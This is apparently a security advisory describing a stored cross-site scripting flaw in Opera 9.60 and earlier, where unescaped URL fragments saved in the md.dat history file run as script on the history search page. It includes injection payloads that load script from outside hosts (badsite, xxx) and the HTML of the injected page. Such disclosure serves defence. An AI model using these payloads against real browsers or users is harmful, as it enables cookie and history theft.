Opera browser is vulnerable to stored Cross Site Scripting. A malicious attacker is able to inject arbitrary browser content through the websites visited with the Opera browser. The code injection is rendered into the Opera History Search page which displays URL and a short description of the visited pages.
* Opera version 9.60 and prior
Opera.exe imports Opera.dll which handles most of the browser functionality. Whenever a user visits a page, the URL, and a part of the content of the visited page is saved and compressed in a file named md.dat. The file md.dat can be found at the following path in a standard Windows Opera installation:
c:\Documents and Settings\user\Local Settings\Application Data\Opera\Opera\profile\vps\0000\md.dat
The vulnerability exists in the way the URL and the content of visited page is stored and rendered from the md.dat file.
Opera History Search Page Generation:
User visits a new site. When the user closes the Opera browser, the file md.dat is updated. The Opera browser appends a block of 2000 bytes for each site visited. The site URL and title are extracted and put in clear text at begin of the 2000 bytes block. The preview content which appears on opera:historysearch page for the site is compressed into the file md.dat. However, the HTML encoding is not consistent across the URL scheme of the site and the injection is possible in the optional fragment of the URL (after the # character).
The following sequence summarises an attack scenario:
1. User visits http://aaa.com/index.htm#<script src=http://badsite/bad.js></script>
2. URL and preview content is stored in the history search page. However, the optional fragment after the character # is not encoded properly.
3. If the user visits the history search page, the cross site scripting is rendered in the user browser context.
Opera History Search Page Rendering:
When accessing the History Search page, Opera reads the file md.dat again. The content from md.dat is decompressed and saved into a buffer. The buffer is then used to generate a cache file that contains the HTML code of the history search page. The cache file can be found such as:
c:\Documents and Settings\user\Local Settings\Application Data\Opera\Opera\profile\cache4\opr000EA
Then Opera reads the content from the cache file to display the history search page. The HTML code is not escaped for the optional fragment on the URL of the visited pages.
Opera History/Cookie Exposed - Exploit Description:
Victim visits site xxx/1.html and clicks on the link. The 1.html source code:
for (x in document.links)
Opera History Cross Site Scripting and Cross Site Request Forgery:
This is the HTML source code of the opera:historysearch?q=* page following the injection (highlighted in bold):
<h2><a href="http://xxx/2.html#<script src=http://xxx/a.js></script>">(null)</a></h2>
<p>This is a proof of concept. </p>
<cite><ins>10/9/2008 12:39:16 AM</ins> - http://xxx/2.html#<script src=http://xxx/a.js></script></cite>
Note that in Opera 9.52, the injection is possible in other locations:
URL: http://xxx/2.html?a="><script src=http://xxx/a.js</script>